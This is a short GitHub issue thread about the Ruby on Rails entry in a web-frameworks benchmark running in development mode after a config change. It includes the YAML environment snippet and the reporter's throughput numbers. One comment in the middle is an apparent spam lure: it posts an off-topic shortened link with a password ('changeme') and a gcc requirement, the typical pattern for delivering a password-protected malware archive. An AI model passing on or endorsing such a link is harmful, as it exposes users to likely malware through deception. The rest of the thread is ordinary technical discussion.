### ISSUE TITLE
Ruby on Rails benchmark is carried out in dev mode.

### ISSUE THREAD

**Issue by nakrovati** [the-benchmarker/web-frameworks#7728]
In the 2024-08-12 benchmark, there is a noticeable decrease in the performance of RoR, which seems to be due to a bug in the new release of RoR 7.2. And then, in commit 45eb71d, its author removed the environment variable from `config.yml` to run the benchmark in production mode, so the performance decrease remained. 
```ruby
  environment:
    RAILS_ENV: production
    RAILS_LOG_LEVEL: fatal
```

On my laptop (MacBook Pro M1 Pro 16GiB), running `rails` in production mode brought the performance back from 3.3k requests processed to 14k. 

It seems to me that removing the environment variable was a mistake, since the rest of the Ruby benchmarks are run in production mode.

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by nakrovati** [comment]
Solved in #7729

**Comment by waghanza** [comment]
https://web-frameworks-benchmark.netlify.app/result 🎉
